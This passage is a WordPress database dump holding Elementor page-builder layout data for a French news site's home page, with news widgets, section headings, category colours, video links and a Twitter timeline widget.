ection_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2317,750,'_elementor_version','0.4'),(2318,750,'_elementor_css','a:3:{s:4:\"time\";i:1509369501;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2320,751,'_elementor_edit_mode','builder'),(2321,751,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"